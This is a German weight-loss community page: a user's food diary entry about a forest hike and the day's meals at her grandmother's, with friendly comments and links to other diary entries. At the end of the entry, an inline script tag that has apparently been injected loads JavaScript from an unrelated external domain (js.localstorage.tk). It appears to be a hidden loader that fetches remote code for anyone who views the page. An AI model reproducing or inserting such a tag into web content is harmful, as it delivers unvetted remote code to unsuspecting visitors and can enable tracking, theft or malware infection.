Zum Inhalt springen

Sie sind hier

212 tagebuch Eintrag/ bin bei meiner oma.

0  0
Am von im Ernährungstagebuch geschrieben

Ich melde mich jetzt auch mal. Smile

Ich bin vom Dienstag abend bis Freitag abend bei meiner oma.
Ich schreibe von Mittwoch.
Morgens nach dem frühstück sind wir im wald wandern gegenagen. War eine schöne strecke war aber sehr anstrengend für meine knie zwichenduch treppen berg hoch berg runter das hat den nicht so gefallen. Wir sind 2 stunden unterwegs gewesen danach waren wir essen den zurück weg wider zum auto war aber kurz.

Frühstück: 1/2 schoko Croissants.
1/2 schwarz brot mit Ziegen frisch käse. 1/2 mir selbst gemachte marmelade. Gurke. Frühstücks ei. O-saft.

Mittag: 3/4 flammkuchen.
(und habe mir nur wasser genommen keine spreit wie sonst im Restaurant.)

Abend: eine scheibe brot mit Oliven öl Knoblauch tomaten Basilikum.

Selbst gemachte pommes mit Bratwurst. Gurken salat und möhren gemüse.

2 kleine kugeln Ananas Basilikum sorbe.

Beim essen kann ich nicht so wirlich entscheiden ich werde schon nicht sterben. :)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Diät Abnehmen - Naschkatzen

Vorheriger Ernährungstagebuch-Eintrag
Bild von ListenToTheVoice Wieder neu durchstarten!
Nächster Ernährungstagebuch-Eintrag
Bild von Gitti Der fünfte Tag, die dritte Woche ist bald rum!

Kommentare

Bild des Benutzers laughy
0  0

Du isst ja nicht immer so und wenns lecker war;-)war eben auch drei std wandern..puh...viel spass noch bei deiner omi:-)

*** Das Leben ist zu kurz um aufzugeben ***

Bild des Benutzers Tabbimaus
0  0

Wow, das war ja für deine Verhältnisse ein echter Schlemmertag Smile hab Spaß, genieße die Zeit und mach dir keine Gedanken!

Bild des Benutzers 1Keks1
0  0

Danke. Haha ja. Xd heute ist es etwas anders. Wir sine in einer Pizzeria und esse einen großen salat mit hänchenbrust. Smile war lecker.

Diät Abnehmen - Naschkatzen

Bild des Benutzers laughy
0  0

Hmmm lecker Smile

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von Flaca: Seit gestern esse ich abends keine Brote mehr und gestern und heute ging es sehr gut. Gestern: Tomaten mit Mozzarella und heute einen Salat mit den restlichen Hähnchenstreifen vom Mittagessen. Ich...
Eintrag in ein Ernährungstagebuch von smart: Da ich selbst eine sehr ungeduldige Kanidatin bin, habe ich mir vorgenommen in meiner Diät nicht nur direkt auf die Nahrung selbst zu achten. Zu einem guten Körpergefühl gehören nämlich noch sehr...
Eintrag in ein Ernährungstagebuch von sumsi83: Nun ist es schon wieder Samstagabend und ich muss noch zwei Tage Essensprotokoll nachholen. Da heute wirklich ein total verrückter und ungeplanter Tag war, wird es etwas schwierig und ich muss...
Ziel für den Abnehmplan von Diecoolejule: Ich neige dazu bei parties richtig reinzuhauen. Da bald eine menge feten sind, soll das nicht passieren.
Eintrag in ein Ernährungstagebuch von Juergen12053: Essen: Morgens hatte ich Hunger und deshalb ist es wohl auch etwas zu viel geworden, drei Scheiben Brot mit Belag und noch eine Mettwurst auf die Faust, Mittags zwei Teller Gemüssesuppe, zum Kaffee...
Eintrag in ein Ernährungstagebuch von Candy2001: So, ich habe mich jetzt 4 Wochen fast perfekt an mein Intermittierendes Fasten gehalten. Gewichtstechnisch stehe ich jetzt bei 65,7 Kilo - also fast nicht abgenommen. Allerdings sagen mir Leute, dass...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst